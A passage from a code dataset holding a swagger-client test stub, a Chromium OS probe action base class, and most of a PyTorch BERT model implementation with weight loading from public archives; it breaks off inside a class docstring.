E501\nfrom octopus_deploy_swagger_client.rest import ApiException\n\n\nclass TestDisplayInfo(unittest.TestCase):\n \"\"\"DisplayInfo unit test stubs\"\"\"\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n def testDisplayInfo(self):\n \"\"\"Test DisplayInfo\"\"\"\n # FIXME: construct object with mandatory attributes with example values\n # model = octopus_deploy_swagger_client.models.display_info.DisplayInfo() # noqa: E501\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n"} {"ext": "py", "sha": "1a2f52e30a61dbd98a07f21b4a7c3f8256082840", "content": "# Copyright 2018 The Chromium OS Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nfrom cros.factory.probe import function\n\n\nclass ActionFunction(function.Function):\n \"\"\"The base class of action functions.\n\n While evaluation, an action function executes a side-effect action. If the\n action is successfully executed, it returns the input data. Otherwise it\n returns an empty list to notify the computation failed.\n \"\"\"\n def Apply(self, data):\n if self.Action():\n return data\n return function.NOTHING\n\n def Action(self):\n \"\"\"Execute an action and return the action is successfully or not.\"\"\"\n raise NotImplementedError\n"} {"ext": "py", "sha": "1a2f5306e653c319496dc7b1f573882ee48345f4", "content": "# coding=utf-8\n# Copyright 2018 The Google AI Language Team Authors and The HugginFace Inc. team.\n# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.\n# Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"PyTorch BERT model.\"\"\"\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport os\nimport copy\nimport json\nimport math\nimport logging\nimport tarfile\nimport tempfile\nimport shutil\n\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom torch.nn import CrossEntropyLoss\n\nfrom torch.utils.checkpoint import checkpoint\n\nfrom olfmlm.data_utils.file_utils import cached_path\n\nlogger = logging.getLogger(__name__)\n\nPRETRAINED_MODEL_ARCHIVE_MAP = {\n 'bert-base-uncased': \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-uncased.tar.gz\",\n 'bert-large-uncased': \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-large-uncased.tar.gz\",\n 'bert-base-cased': \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-cased.tar.gz\",\n 'bert-large-cased': \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-large-cased.tar.gz\",\n 'bert-base-multilingual-uncased': \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-multilingual-uncased.tar.gz\",\n 'bert-base-multilingual-cased': \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-multilingual-cased.tar.gz\",\n 'bert-base-chinese': \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-chinese.tar.gz\",\n}\nCONFIG_NAME = 'bert_config.json'\nWEIGHTS_NAME = 
'pytorch_model.bin'\nTF_WEIGHTS_NAME = 'model.ckpt'\n\ndef load_tf_weights_in_bert(model, tf_checkpoint_path):\n \"\"\" Load tf checkpoints in a pytorch model\n \"\"\"\n try:\n import re\n import numpy as np\n import tensorflow as tf\n except ImportError:\n print(\"Loading a TensorFlow models in PyTorch, requires TensorFlow to be installed. Please see \"\n \"https://www.tensorflow.org/install/ for installation instructions.\")\n raise\n tf_path = os.path.abspath(tf_checkpoint_path)\n print(\"Converting TensorFlow checkpoint from {}\".format(tf_path))\n # Load weights from TF model\n init_vars = tf.train.list_variables(tf_path)\n names = []\n arrays = []\n for name, shape in init_vars:\n print(\"Loading TF weight {} with shape {}\".format(name, shape))\n array = tf.train.load_variable(tf_path, name)\n names.append(name)\n arrays.append(array)\n\n for name, array in zip(names, arrays):\n name = name.split('/')\n # adam_v and adam_m are variables used in AdamWeightDecayOptimizer to calculated m and v\n # which are not required for using pretrained model\n if any(n in [\"adam_v\", \"adam_m\"] for n in name):\n print(\"Skipping {}\".format(\"/\".join(name)))\n continue\n pointer = model\n for m_name in name:\n if re.fullmatch(r'[A-Za-z]+_\\d+', m_name):\n l = re.split(r'_(\\d+)', m_name)\n else:\n l = [m_name]\n if l[0] == 'kernel' or l[0] == 'gamma':\n pointer = getattr(pointer, 'weight')\n elif l[0] == 'output_bias' or l[0] == 'beta':\n pointer = getattr(pointer, 'bias')\n elif l[0] == 'output_weights':\n pointer = getattr(pointer, 'weight')\n else:\n pointer = getattr(pointer, l[0])\n if len(l) >= 2:\n num = int(l[1])\n pointer = pointer[num]\n if m_name[-11:] == '_embeddings':\n pointer = getattr(pointer, 'weight')\n elif m_name == 'kernel':\n array = np.transpose(array)\n try:\n assert pointer.shape == array.shape\n except AssertionError as e:\n e.args += (pointer.shape, array.shape)\n raise\n print(\"Initialize PyTorch weight {}\".format(name))\n pointer.data = torch.from_numpy(array)\n return model\n\n\ndef gelu(x):\n \"\"\"Implementation of the gelu activation function.\n For information: OpenAI GPT's gelu is slightly different (and gives slightly different results):\n 0.5 * x * (1 + torch.tanh(math.sqrt(2 / math.pi) * (x + 0.044715 * torch.pow(x, 3))))\n \"\"\"\n return x * 0.5 * (1.0 + torch.erf(x / math.sqrt(2.0)))\n\n\ndef swish(x):\n return x * torch.sigmoid(x)\n\n\nACT2FN = {\"gelu\": gelu, \"relu\": torch.nn.functional.relu, \"swish\": swish}\n\nclass BertConfig(object):\n \"\"\"Configuration class to store the configuration of a `BertModel`.\n \"\"\"\n def __init__(self,\n vocab_size_or_config_json_file,\n hidden_size=768,\n num_hidden_layers=12,\n num_attention_heads=12,\n intermediate_size=3072,\n hidden_act=\"gelu\",\n hidden_dropout_prob=0.1,\n attention_probs_dropout_prob=0.1,\n max_position_embeddings=512,\n type_vocab_size=2,\n initializer_range=0.02,\n fp32_layernorm=True,\n fp32_embedding=True,\n fp32_tokentypes=False,\n layernorm_epsilon=1e-12):\n \"\"\"Constructs BertConfig.\n\n Args:\n vocab_size_or_config_json_file: Vocabulary size of `inputs_ids` in `BertModel`.\n hidden_size: Size of the encoder layers and the pooler layer.\n num_hidden_layers: Number of hidden layers in the Transformer encoder.\n num_attention_heads: Number of attention heads for each attention layer in\n the Transformer encoder.\n intermediate_size: The size of the \"intermediate\" (i.e., feed-forward)\n layer in the Transformer encoder.\n hidden_act: The non-linear activation function (function 
or string) in the\n encoder and pooler. If string, \"gelu\", \"relu\" and \"swish\" are supported.\n hidden_dropout_prob: The dropout probabilitiy for all fully connected\n layers in the embeddings, encoder, and pooler.\n attention_probs_dropout_prob: The dropout ratio for the attention\n probabilities.\n max_position_embeddings: The maximum sequence length that this model might\n ever be used with. Typically set this to something large just in case\n (e.g., 512 or 1024 or 2048).\n type_vocab_size: The vocabulary size of the `token_type_ids` passed into\n `BertModel`.\n initializer_range: The sttdev of the truncated_normal_initializer for\n initializing all weight matrices.\n \"\"\"\n if isinstance(vocab_size_or_config_json_file, str):\n with open(vocab_size_or_config_json_file, \"r\", encoding='utf-8') as reader:\n json_config = json.loads(reader.read())\n for key, value in json_config.items():\n self.__dict__[key] = value\n elif isinstance(vocab_size_or_config_json_file, int):\n self.vocab_size = vocab_size_or_config_json_file\n self.hidden_size = hidden_size\n self.num_hidden_layers = num_hidden_layers\n self.num_attention_heads = num_attention_heads\n self.hidden_act = hidden_act\n self.intermediate_size = intermediate_size\n self.hidden_dropout_prob = hidden_dropout_prob\n self.attention_probs_dropout_prob = attention_probs_dropout_prob\n self.max_position_embeddings = max_position_embeddings\n self.type_vocab_size = type_vocab_size\n self.initializer_range = initializer_range\n self.fp32_layernorm = fp32_layernorm\n self.fp32_embedding = fp32_embedding\n self.layernorm_epsilon = layernorm_epsilon\n self.fp32_tokentypes = fp32_tokentypes\n else:\n raise ValueError(\"First argument must be either a vocabulary size (int)\"\n \"or the path to a pretrained model config file (str)\")\n\n @classmethod\n def from_dict(cls, json_object):\n \"\"\"Constructs a `BertConfig` from a Python dictionary of parameters.\"\"\"\n config = BertConfig(vocab_size_or_config_json_file=-1)\n for key, value in json_object.items():\n config.__dict__[key] = value\n return config\n\n @classmethod\n def from_json_file(cls, json_file):\n \"\"\"Constructs a `BertConfig` from a json file of parameters.\"\"\"\n with open(json_file, \"r\", encoding='utf-8') as reader:\n text = reader.read()\n return cls.from_dict(json.loads(text))\n\n def __repr__(self):\n return str(self.to_json_string())\n\n def to_dict(self):\n \"\"\"Serializes this instance to a Python dictionary.\"\"\"\n output = copy.deepcopy(self.__dict__)\n return output\n\n def to_json_string(self):\n \"\"\"Serializes this instance to a JSON string.\"\"\"\n return json.dumps(self.to_dict(), indent=2, sort_keys=True) + \"\\n\"\n\n# try:\n# from apex.normalization.fused_layer_norm import FusedLayerNorm as BertLayerNorm\n# except ImportError:\n# print(\"Better speed can be achieved with apex installed from https://www.github.com/nvidia/apex.\")\n# class BertLayerNorm(nn.Module):\n# def __init__(self, hidden_size, eps=1e-12):\n# \"\"\"Construct a layernorm module in the TF style (epsilon inside the square root).\n# \"\"\"\n# super(BertLayerNorm, self).__init__()\n# self.weight = nn.Parameter(torch.ones(hidden_size))\n# self.bias = nn.Parameter(torch.zeros(hidden_size))\n# self.variance_epsilon = eps\n\n# def forward(self, x):\n# u = x.mean(-1, keepdim=True)\n# s = (x - u).pow(2).mean(-1, keepdim=True)\n# x = (x - u) / torch.sqrt(s + self.variance_epsilon)\n# return self.weight * x + self.bias\n\nclass BertLayerNorm(nn.Module):\n def __init__(self, hidden_size, 
eps=1e-12):\n \"\"\"Construct a layernorm module in the TF style (epsilon inside the square root).\n \"\"\"\n super(BertLayerNorm, self).__init__()\n self.weight = nn.Parameter(torch.ones(hidden_size))\n self.bias = nn.Parameter(torch.zeros(hidden_size))\n self.variance_epsilon = eps\n\n def forward(self, x):\n u = x.mean(-1, keepdim=True)\n s = (x - u).pow(2).mean(-1, keepdim=True)\n x = (x - u) / torch.sqrt(s + self.variance_epsilon)\n return self.weight * x + self.bias\n\nclass BertEmbeddings(nn.Module):\n \"\"\"Construct the embeddings from word, position and token_type embeddings.\n \"\"\"\n def __init__(self, config):\n super(BertEmbeddings, self).__init__()\n self.word_embeddings = nn.Embedding(config.vocab_size, config.hidden_size, padding_idx=0)\n self.position_embeddings = nn.Embedding(config.max_position_embeddings, config.hidden_size)\n self.token_type_embeddings = nn.Embedding(config.type_vocab_size, config.hidden_size)\n self.task_type_embeddings = nn.Embedding(config.num_tasks, config.hidden_size)\n\n # self.LayerNorm is not snake-cased to stick with TensorFlow model variable name and be able to load\n # any TensorFlow checkpoint file\n self.LayerNorm = BertLayerNorm(config.hidden_size, eps=config.layer_norm_eps)\n self.dropout = nn.Dropout(config.hidden_dropout_prob)\n\n def forward(self, input_ids, token_type_ids=None, task_ids=None):\n seq_length = input_ids.size(1)\n position_ids = torch.arange(seq_length, dtype=torch.long, device=input_ids.device)\n position_ids = position_ids.unsqueeze(0).expand_as(input_ids)\n if token_type_ids is None:\n token_type_ids = torch.zeros_like(input_ids)\n if task_ids is None:\n task_ids = torch.zeros_like(input_ids)\n\n words_embeddings = self.word_embeddings(input_ids)\n position_embeddings = self.position_embeddings(position_ids)\n token_type_embeddings = self.token_type_embeddings(token_type_ids)\n task_embeddings = self.task_type_embeddings(task_ids)\n\n embeddings = words_embeddings + position_embeddings + token_type_embeddings + task_embeddings\n embeddings = self.LayerNorm(embeddings)\n embeddings = self.dropout(embeddings)\n return embeddings\n\n\nclass BertSelfAttention(nn.Module):\n def __init__(self, config):\n super(BertSelfAttention, self).__init__()\n if config.hidden_size % config.num_attention_heads != 0:\n raise ValueError(\n \"The hidden size (%d) is not a multiple of the number of attention \"\n \"heads (%d)\" % (config.hidden_size, config.num_attention_heads))\n self.num_attention_heads = config.num_attention_heads\n self.attention_head_size = int(config.hidden_size / config.num_attention_heads)\n self.all_head_size = self.num_attention_heads * self.attention_head_size\n\n self.query = nn.Linear(config.hidden_size, self.all_head_size)\n self.key = nn.Linear(config.hidden_size, self.all_head_size)\n self.value = nn.Linear(config.hidden_size, self.all_head_size)\n\n self.dropout = nn.Dropout(config.attention_probs_dropout_prob)\n\n def transpose_for_scores(self, x):\n new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size)\n x = x.view(*new_x_shape)\n return x.permute(0, 2, 1, 3)\n\n def forward(self, hidden_states, attention_mask):\n\n mixed_query_layer = self.query(hidden_states)\n mixed_key_layer = self.key(hidden_states)\n mixed_value_layer = self.value(hidden_states)\n\n query_layer = self.transpose_for_scores(mixed_query_layer)\n key_layer = self.transpose_for_scores(mixed_key_layer)\n value_layer = self.transpose_for_scores(mixed_value_layer)\n\n # Take the dot product between \"query\" 
and \"key\" to get the raw attention scores.\n attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2))\n attention_scores = attention_scores / math.sqrt(self.attention_head_size)\n # Apply the attention mask is (precomputed for all layers in BertModel forward() function)\n attention_scores = attention_scores + attention_mask\n\n # Normalize the attention scores to probabilities.\n attention_probs = nn.Softmax(dim=-1)(attention_scores)\n\n # This is actually dropping out entire tokens to attend to, which might\n # seem a bit unusual, but is taken from the original Transformer paper.\n attention_probs = self.dropout(attention_probs)\n \n previous_type = attention_probs.type()\n context_layer = torch.matmul(attention_probs, value_layer)\n context_layer = context_layer.permute(0, 2, 1, 3).contiguous()\n new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,)\n context_layer = context_layer.view(*new_context_layer_shape)\n return context_layer\n\n\nclass BertSelfOutput(nn.Module):\n def __init__(self, config):\n super(BertSelfOutput, self).__init__()\n self.dense = nn.Linear(config.hidden_size, config.hidden_size)\n self.fp32_layernorm = config.fp32_layernorm\n self.LayerNorm = BertLayerNorm(config.hidden_size, eps=config.layernorm_epsilon)\n self.dropout = nn.Dropout(config.hidden_dropout_prob)\n\n def forward(self, hidden_states, input_tensor):\n hidden_states = self.dense(hidden_states)\n hidden_states = self.dropout(hidden_states)\n ln_input = hidden_states + input_tensor\n previous_type = ln_input.type()\n if self.fp32_layernorm:\n ln_input = ln_input.float()\n hidden_states = self.LayerNorm(ln_input)\n if self.fp32_layernorm:\n hidden_states = hidden_states.type(previous_type)\n return hidden_states\n\n\nclass BertAttention(nn.Module):\n def __init__(self, config):\n super(BertAttention, self).__init__()\n self.self = BertSelfAttention(config)\n self.output = BertSelfOutput(config)\n\n def forward(self, input_tensor, attention_mask):\n self_output = self.self(input_tensor, attention_mask)\n attention_output = self.output(self_output, input_tensor)\n return attention_output\n\n\nclass BertIntermediate(nn.Module):\n def __init__(self, config):\n super(BertIntermediate, self).__init__()\n self.dense = nn.Linear(config.hidden_size, config.intermediate_size)\n self.intermediate_act_fn = ACT2FN[config.hidden_act] \\\n if isinstance(config.hidden_act, str) else config.hidden_act\n\n def forward(self, hidden_states):\n hidden_states = self.dense(hidden_states)\n hidden_states = self.intermediate_act_fn(hidden_states)\n return hidden_states\n\n\nclass BertOutput(nn.Module):\n def __init__(self, config):\n super(BertOutput, self).__init__()\n self.dense = nn.Linear(config.intermediate_size, config.hidden_size)\n self.fp32_layernorm = config.fp32_layernorm\n self.LayerNorm = BertLayerNorm(config.hidden_size, eps=config.layernorm_epsilon)\n self.dropout = nn.Dropout(config.hidden_dropout_prob)\n\n def forward(self, hidden_states, input_tensor):\n hidden_states = self.dense(hidden_states)\n hidden_states = self.dropout(hidden_states)\n ln_input = hidden_states + input_tensor\n previous_type = ln_input.type()\n if self.fp32_layernorm:\n ln_input = ln_input.float()\n hidden_states = self.LayerNorm(ln_input)\n if self.fp32_layernorm:\n hidden_states = hidden_states.type(previous_type)\n return hidden_states\n\n\nclass BertLayer(nn.Module):\n def __init__(self, config):\n super(BertLayer, self).__init__()\n self.attention = BertAttention(config)\n self.intermediate = 
BertIntermediate(config)\n self.output = BertOutput(config)\n\n def forward(self, hidden_states, attention_mask):\n attention_output = self.attention(hidden_states, attention_mask)\n intermediate_output = self.intermediate(attention_output)\n layer_output = self.output(intermediate_output, attention_output)\n return layer_output\n\n\nclass BertEncoder(nn.Module):\n def __init__(self, config):\n super(BertEncoder, self).__init__()\n layer = BertLayer(config)\n self.layer = nn.ModuleList([copy.deepcopy(layer) for _ in range(config.num_hidden_layers)])\n\n # def forward(self, hidden_states, attention_mask, output_all_encoded_layers=True):\n # all_encoder_layers = []\n # for layer_module in self.layer:\n # hidden_states = layer_module(hidden_states, attention_mask)\n # if output_all_encoded_layers:\n # all_encoder_layers.append(hidden_states)\n # if not output_all_encoded_layers:\n # all_encoder_layers.append(hidden_states)\n # return all_encoder_layers\n def forward(self, hidden_states, attention_mask, output_all_encoded_layers=True, checkpoint_activations=False):\n all_encoder_layers = []\n def custom(start, end):\n def custom_forward(*inputs):\n layers = self.layer[start:end]\n x_ = inputs[0]\n for layer in layers:\n x_ = layer(x_, inputs[1])\n return x_\n return custom_forward\n\n if checkpoint_activations:\n l = 0\n num_layers = len(self.layer)\n chunk_length = math.ceil(math.sqrt(num_layers))\n while l < num_layers:\n hidden_states = checkpoint(custom(l, l+chunk_length), hidden_states, attention_mask*1)\n l += chunk_length\n # decoder layers\n else:\n for i,layer_module in enumerate(self.layer):\n hidden_states = layer_module(hidden_states, attention_mask)\n\n if output_all_encoded_layers:\n all_encoder_layers.append(hidden_states)\n\n if not output_all_encoded_layers or checkpoint_activations:\n all_encoder_layers.append(hidden_states)\n return all_encoder_layers\n\n\nclass BertPooler(nn.Module):\n def __init__(self, config):\n super(BertPooler, self).__init__()\n self.dense = nn.Linear(config.hidden_size, config.hidden_size)\n self.activation = nn.Tanh()\n\n def forward(self, hidden_states):\n # We \"pool\" the model by simply taking the hidden state corresponding\n # to the first token.\n first_token_tensor = hidden_states[:, 0]\n pooled_output = self.dense(first_token_tensor)\n pooled_output = self.activation(pooled_output)\n return pooled_output\n\n\nclass BertPredictionHeadTransform(nn.Module):\n def __init__(self, config):\n super(BertPredictionHeadTransform, self).__init__()\n self.dense = nn.Linear(config.hidden_size, config.hidden_size)\n self.transform_act_fn = ACT2FN[config.hidden_act] \\\n if isinstance(config.hidden_act, str) else config.hidden_act\n self.LayerNorm = BertLayerNorm(config.hidden_size, eps=config.layernorm_epsilon)\n self.fp32_layernorm = config.fp32_layernorm\n\n def forward(self, hidden_states):\n hidden_states = self.dense(hidden_states)\n hidden_states = self.transform_act_fn(hidden_states)\n previous_type = hidden_states.type()\n if self.fp32_layernorm:\n hidden_states = hidden_states.float()\n hidden_states = self.LayerNorm(hidden_states)\n if self.fp32_layernorm:\n hidden_states = hidden_states.type(previous_type)\n return hidden_states\n\n\nclass BertLMPredictionHead(nn.Module):\n def __init__(self, config, bert_model_embedding_weights):\n super(BertLMPredictionHead, self).__init__()\n self.transform = BertPredictionHeadTransform(config)\n\n # The output weights are the same as the input embeddings, but there is\n # an output-only bias for each 
token.\n self.decoder = nn.Linear(bert_model_embedding_weights.size(1),\n bert_model_embedding_weights.size(0),\n bias=False)\n self.decoder.weight = bert_model_embedding_weights\n self.bias = nn.Parameter(torch.zeros(bert_model_embedding_weights.size(0)))\n\n def forward(self, hidden_states):\n hidden_states = self.transform(hidden_states)\n hidden_states = self.decoder(hidden_states) + self.bias\n return hidden_states\n\nclass BertOnlyMLMHead(nn.Module):\n def __init__(self, config, bert_model_embedding_weights):\n super(BertOnlyMLMHead, self).__init__()\n self.predictions = BertLMPredictionHead(config, bert_model_embedding_weights)\n\n def forward(self, sequence_output):\n prediction_scores = self.predictions(sequence_output)\n return prediction_scores\n\n\nclass BertOnlyNSPHead(nn.Module):\n def __init__(self, config):\n super(BertOnlyNSPHead, self).__init__()\n self.seq_relationship = nn.Linear(config.hidden_size, 2)\n\n def forward(self, pooled_output):\n seq_relationship_score = self.seq_relationship(pooled_output)\n return seq_relationship_score\n\n\nclass BertPreTrainingHeads(nn.Module):\n def __init__(self, config, bert_model_embedding_weights):\n super(BertPreTrainingHeads, self).__init__()\n self.predictions = BertLMPredictionHead(config, bert_model_embedding_weights)\n self.seq_relationship = nn.Linear(config.hidden_size, 2)\n\n def forward(self, sequence_output, pooled_output):\n prediction_scores = self.predictions(sequence_output)\n for p in self.seq_relationship.parameters():\n if p is None:\n continue\n pooled_output = pooled_output.type_as(p)\n seq_relationship_score = self.seq_relationship(pooled_output)\n return prediction_scores, seq_relationship_score\n\n\nclass PreTrainedBertModel(nn.Module):\n \"\"\" An abstract class to handle weights initialization and\n a simple interface for dowloading and loading pretrained models.\n \"\"\"\n def __init__(self, config, *inputs, **kwargs):\n super(PreTrainedBertModel, self).__init__()\n if not isinstance(config, BertConfig):\n raise ValueError(\n \"Parameter config in `{}(config)` should be an instance of class `BertConfig`. \"\n \"To create a model from a Google pretrained model use \"\n \"`model = {}.from_pretrained(PRETRAINED_MODEL_NAME)`\".format(\n self.__class__.__name__, self.__class__.__name__\n ))\n self.config = config\n\n def init_bert_weights(self, module):\n \"\"\" Initialize the weights.\n \"\"\"\n if isinstance(module, (nn.Linear, nn.Embedding)):\n # Slightly different from the TF version which uses truncated_normal for initialization\n # cf https://github.com/pytorch/pytorch/pull/5617\n module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)\n elif isinstance(module, BertLayerNorm):\n module.bias.data.zero_()\n module.weight.data.fill_(1.0)\n if isinstance(module, nn.Linear) and module.bias is not None:\n module.bias.data.zero_()\n\n @classmethod\n def from_pretrained(cls, pretrained_model_name, state_dict=None, cache_dir=None,\n fp32_layernorm=False, fp32_embedding=False, layernorm_epsilon=1e-12,\n fp32_tokentypes=False, *inputs, **kwargs):\n \"\"\"\n Instantiate a PreTrainedBertModel from a pre-trained model file or a pytorch state dict.\n Download and cache the pre-trained model file if needed.\n\n Params:\n pretrained_model_name: either:\n - a str with the name of a pre-trained model to load selected in the list of:\n . `bert-base-uncased`\n . `bert-large-uncased`\n . `bert-base-cased`\n . `bert-large-cased`\n . `bert-base-multilingual-uncased`\n . `bert-base-multilingual-cased`\n . 
`bert-base-chinese`\n - a path or url to a pretrained model archive containing:\n . `bert_config.json` a configuration file for the model\n . `pytorch_model.bin` a PyTorch dump of a BertForPreTraining instance\n cache_dir: an optional path to a folder in which the pre-trained models will be cached.\n state_dict: an optional state dictionnary (collections.OrderedDict object) to use instead of Google pre-trained models\n *inputs, **kwargs: additional input for the specific Bert class\n (ex: num_labels for BertForSequenceClassification)\n \"\"\"\n if pretrained_model_name in PRETRAINED_MODEL_ARCHIVE_MAP:\n archive_file = PRETRAINED_MODEL_ARCHIVE_MAP[pretrained_model_name]\n else:\n archive_file = pretrained_model_name\n # redirect to the cache, if necessary\n try:\n resolved_archive_file = cached_path(archive_file, cache_dir=cache_dir)\n except FileNotFoundError:\n logger.error(\n \"Model name '{}' was not found in model name list ({}). \"\n \"We assumed '{}' was a path or url but couldn't find any file \"\n \"associated to this path or url.\".format(\n pretrained_model_name,\n ', '.join(PRETRAINED_MODEL_ARCHIVE_MAP.keys()),\n archive_file))\n return None\n if resolved_archive_file == archive_file:\n logger.info(\"loading archive file {}\".format(archive_file))\n else:\n logger.info(\"loading archive file {} from cache at {}\".format(\n archive_file, resolved_archive_file))\n tempdir = None\n if os.path.isdir(resolved_archive_file):\n serialization_dir = resolved_archive_file\n else:\n # Extract archive to temp dir\n tempdir = tempfile.mkdtemp()\n logger.info(\"extracting archive file {} to temp dir {}\".format(\n resolved_archive_file, tempdir))\n with tarfile.open(resolved_archive_file, 'r:gz') as archive:\n archive.extractall(tempdir)\n serialization_dir = tempdir\n # Load config\n config_file = os.path.join(serialization_dir, CONFIG_NAME)\n config = BertConfig.from_json_file(config_file)\n config.fp32_layernorm = fp32_layernorm\n config.fp32_embedding = fp32_embedding\n config.layernorm_epsilon = layernorm_epsilon\n config.fp32_tokentypes = fp32_tokentypes\n logger.info(\"Model config {}\".format(config))\n # Instantiate model.\n model = cls(config, *inputs, **kwargs)\n if state_dict is None:\n weights_path = os.path.join(serialization_dir, WEIGHTS_NAME)\n state_dict = torch.load(weights_path)\n\n old_keys = []\n new_keys = []\n for key in state_dict.keys():\n new_key = None\n if 'gamma' in key:\n new_key = key.replace('gamma', 'weight')\n if 'beta' in key:\n new_key = key.replace('beta', 'bias')\n if new_key:\n old_keys.append(key)\n new_keys.append(new_key)\n for old_key, new_key in zip(old_keys, new_keys):\n state_dict[new_key] = state_dict.pop(old_key)\n\n missing_keys = []\n unexpected_keys = []\n error_msgs = []\n # copy state_dict so _load_from_state_dict can modify it\n metadata = getattr(state_dict, '_metadata', None)\n state_dict = state_dict.copy()\n if metadata is not None:\n state_dict._metadata = metadata\n\n def load(module, prefix=''):\n local_metadata = {} if metadata is None else metadata.get(prefix[:-1], {})\n module._load_from_state_dict(\n state_dict, prefix, local_metadata, True, missing_keys, unexpected_keys, error_msgs)\n for name, child in module._modules.items():\n if child is not None:\n load(child, prefix + name + '.')\n load(model, prefix='' if hasattr(model, 'bert') else 'bert.')\n if len(missing_keys) > 0:\n logger.info(\"Weights of {} not initialized from pretrained model: {}\".format(\n model.__class__.__name__, missing_keys))\n if len(unexpected_keys) > 
0:\n logger.info(\"Weights from pretrained model not used in {}: {}\".format(\n model.__class__.__name__, unexpected_keys))\n if tempdir:\n # Clean up temp dir\n shutil.rmtree(tempdir)\n return model\n\n\nclass BertModel(PreTrainedBertModel):\n \"\"\"BERT model (\"Bidirectional Embedding Representations from a Transformer\").\n\n Params:\n config: a BertConfig class instance with the configuration to build a new model\n\n Inputs:\n `input_ids`: a torch.LongTensor of shape [batch_size, sequence_length]\n with the word token indices in the vocabulary(see the tokens preprocessing logic in the scripts\n `extract_features.py`, `run_classifier.py` and `run_squad.py`)\n `token_type_ids`: an optional torch.LongTensor of shape [batch_size, sequence_length] with the token\n types indices selected in [0, 1]. Type 0 corresponds to a `sentence A` and type 1 corresponds to\n a `sentence B` token (see BERT paper for more details).\n `attention_mask`: an optional torch.LongTensor of shape [batch_size, sequence_length] with indices\n selected in [0, 1]. It's a mask to be used if the input sequence length is smaller than the max\n input sequence length in the current batch. It's the mask that we typically use for attention when\n a batch has varying length sentences.\n `output_all_encoded_layers`: boolean which controls the content of the `encoded_layers` output as described below. Default: `True`.\n\n Outputs: Tuple of (encoded_layers, pooled_output)\n `encoded_layers`: controled by `output_all_encoded_layers` argument:\n - `output_all_encoded_layers=True`: outputs a list of the full sequences of encoded-hidden-states at the end\n of each attention block (i.e. 12 full sequences for BERT-base, 24 for BERT-large), each\n encoded-hidden-state is a torch.FloatTensor of size [batch_size, sequence_length, hidden_size],\n - `output_all_encoded_layers=False`: outputs only the full sequence of hidden-states corresponding\n to the last attention block of shape [batch_size, sequence_length, hidden_size],\n `pooled_output`: a torch.FloatTensor of size [batch_size, hidden_size] which is the output of a\n classifier pretrained on top of the hidden state associated to the first character of the\n input (`CLF`) to train on the Next-Sentence task (see BERT's paper).\n\n Example usage:\n ```python\n # Already been converted into WordPiece token ids\n input_ids = torch.LongTensor([[31, 51, 99], [15, 5, 0]])\n input_mask = torch.LongTensor([[1, 1, 1], [1, 1, 0]])\n token_type_ids = torch.LongTensor([[0, 0, 1], [0, 1, 0]])\n\n config = modeling.BertConfig(vocab_size_or_config_json_file=32000, hidden_size=768,\n num_hidden_layers=12, num_attention_heads=12, intermediate_size=3072)\n\n model = modeling.BertModel(config=config)\n all_encoder_layers, pooled_output = model(input_ids, token_type_ids, input_mask)\n ```\n \"\"\"\n def __init__(self, config):\n super(BertModel, self).__init__(config)\n self.embeddings = BertEmbeddings(config)\n self.encoder = BertEncoder(config)\n self.pooler = BertPooler(config)\n self.apply(self.init_bert_weights)\n\n def forward(self, input_ids, token_type_ids=None, task_ids=None, attention_mask=None, output_all_encoded_layers=True, checkpoint_activations=False):\n if attention_mask is None:\n attention_mask = torch.ones_like(input_ids)\n if token_type_ids is None:\n token_type_ids = torch.zeros_like(input_ids)\n if task_ids is None:\n task_ids = torch.zeros_like(input_ids)\n\n # We create a 3D attention mask from a 2D tensor mask.\n # Sizes are [batch_size, 1, 1, to_seq_length]\n # So we can 
broadcast to [batch_size, num_heads, from_seq_length, to_seq_length]\n # this attention mask is more simple than the triangular masking of causal attention\n # used in OpenAI GPT, we just need to prepare the broadcast dimension here.\n extended_attention_mask = attention_mask.unsqueeze(1).unsqueeze(2)\n\n # Since attention_mask is 1.0 for positions we want to attend and 0.0 for\n # masked positions, this operation will create a tensor which is 0.0 for\n # positions we want to attend and -10000.0 for masked positions.\n # Since we are adding it to the raw scores before the softmax, this is\n # effectively the same as removing these entirely.\n extended_attention_mask = extended_attention_mask.to(dtype=next(self.encoder.parameters()).dtype)\n extended_attention_mask = (1.0 - extended_attention_mask) * -10000.0\n\n embedding_output = self.embeddings(input_ids, token_type_ids, task_ids)\n encoded_layers = self.encoder(embedding_output,\n extended_attention_mask,\n output_all_encoded_layers=output_all_encoded_layers,\n checkpoint_activations=checkpoint_activations)\n sequence_output = encoded_layers[-1]\n for p in self.pooler.parameters():\n if p is None:\n continue\n sequence_output = sequence_output.type_as(p)\n break\n pooled_output = self.pooler(sequence_output)\n if not output_all_encoded_layers or checkpoint_activations:\n encoded_layers = encoded_layers[-1]\n return encoded_layers, pooled_output\n\n\nclass BertForPreTraining(PreTrainedBertModel):\n \"\"\"BERT model with pre-training heads.\n This module comprises the BERT model followed by the two pre-training heads:\n - the masked language modeling head, and\n - the next sentence classification head.\n\n Params:\n config: a BertConfig class instance with the configuration to build a new model.\n\n Inputs:\n `input_ids`: a torch.LongTensor of shape [batch_size, sequence_length]\n with the word token indices in the vocabulary(see the tokens preprocessing logic in the 